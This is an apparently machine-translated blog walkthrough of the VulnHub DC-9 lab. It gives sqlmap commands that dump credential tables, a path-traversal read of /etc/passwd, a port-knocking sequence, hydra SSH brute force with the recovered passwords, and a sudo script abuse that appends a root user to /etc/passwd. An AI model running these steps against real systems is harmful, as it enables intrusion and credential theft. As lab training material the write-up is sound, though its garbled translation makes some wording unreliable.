【vulnhub】DC9

Blog home page ： Happy star The blog home page of
Series column ：vulnhub
Welcome to focus on the likes collection ️ Leaving a message.
Starting time ：2022 year 7 month 15 Japan
The author's level is very limited , If an error is found , Please let me know , thank ！

The target is in bridge mode , Set up kali For bridge mode

The host found arp-scan -l

Port scanning nmap -p- -sV 192.168.1.104

80 Port open ,22 port filtered( Port status filtered： Port status filtered Because the message cannot reach the specified port ,nmap Cannot determine the open state of the port .)

visit 80 port

User information page

Search page

Background management interface

The search page prompts us to search by last name or first name , We try it with the first user of the user information interface
Search for Mary

Determine whether there is injection
Mary' and 1=1# I can find out
Mary' and 1=2# Can't find out

So there is SQL Inject holes

the reason being that POST Ginseng , So we want to use bp Grab a bag , Save as 1.txt, And then use sqlmap Of -r Parameters can be

Here's another way

Use the browser's own packet capture , The name of the view parameter is search, And in result.php
Use sqlmap Of –data Parameters can be

sqlmap -u "http://192.168.1.104/results.php" --dbs --data "search=1" --batch // Database search

sqlmap -u "http://192.168.1.104/results.php" -D users --tables --data "search=1" --batch // Look up the table

sqlmap -u "http://192.168.1.104/results.php" -D users -T UserDetails --columns --data "search=1" --batch // Check field

sqlmap -u "http://192.168.1.104/results.php" -D users -T UserDetails -C "id,username,password" --dump --data "search=1" --batch // Derived data

Get the password of some user accounts , It seems to be plaintext directly

sqlmap -u "http://192.168.1.104/results.php" -D Staff --tables --data "search=1" --batch // check Staff database

sqlmap -u "http://192.168.1.104/results.php" -D Staff -T StaffDetails --columns --data "search=1" --batch // Check field

sqlmap -u "http://192.168.1.104/results.php" -D Staff -T StaffDetails -C "id,username,password" --dump --data "search=1" --batch // Check field

see Users surface
sqlmap -u "http://192.168.1.104/results.php" -D Staff -T Users --columns --data "search=1" --batch // Check field

sqlmap -u "http://192.168.1.104/results.php" -D Staff -T Users -C "Username,Password" --dump --data "search=1" --batch

admin user

The password for transorbital1

Log in backstage

The display file does not exist , There may be a File Inclusion Vulnerability
http://192.168.1.104/manage.php?file=../../../../etc/passwd

See these user names , We just took off our pants and got
So consider ssh
however ssh Status as filtered, It may be filtered by the firewall
http://192.168.1.104/manage.php?file=../../../../etc/knockd.conf
View the configuration file

/etc/knockd.conf The configuration in will cause ssh Connection rejected , It dynamically adds iptables Rules to hide the services opened by the system .

Use a custom series of serial numbers to “ Knock at the door ”, Enable the system to open the service port to be accessed , To access . When not in use , Then use the custom serial number to “ close ”, Close the port , No external monitoring . Further improve the security of services and systems .

Sequential access 7469、8475、9842 port

nmap -p 7469 192.168.1.104
nmap -p 8475 192.168.1.104
nmap -p 9842 192.168.1.104
nmap -p 22 10.10.10.135

opened

Use the account and password you get , Use hydra Blasting
users.txt

marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2

pass.txt

3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0

hydra -L users.txt -P pass.txt 192.168.1.104 ssh

Got three users

[22][ssh] host: 192.168.1.104   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.1.104   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.1.104   login: janitor   password: Ilovepeepee

Log in to these three users in turn , Collect information
ssh [email protected]
ssh [email protected]

stay janitor Found a dictionary under the directory of , Add it to our password dictionary , Keep blasting ssh service

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Update pass.txt
Use... Again hydra Blast

One more user

login：fredf   password：B4-Tru3-001

Direct login

Right to raise
sudo -l

There is one test, No password required

Get into test Catalog , And try to execute

Tips need to be test.py

In the catalog /opt/devstuff Found in the test.py

Write the contents of the first file to the second file

So we can rewrite /etc/passwd , Add one root user

Use openssl Generate a hashopenssl passwd -1 -salt coder 123456

$1$coder$FFj87UJt/aBpDjcIMTCtR1

echo 'coder:$1$coder$FFj87UJt/aBpDjcIMTCtR1:0:0:root:/bin/bash' >> /tmp/DC9
sudo python ./test.py /tmp/DC9 /etc/passwd
su coder
stay root Found under home directory flag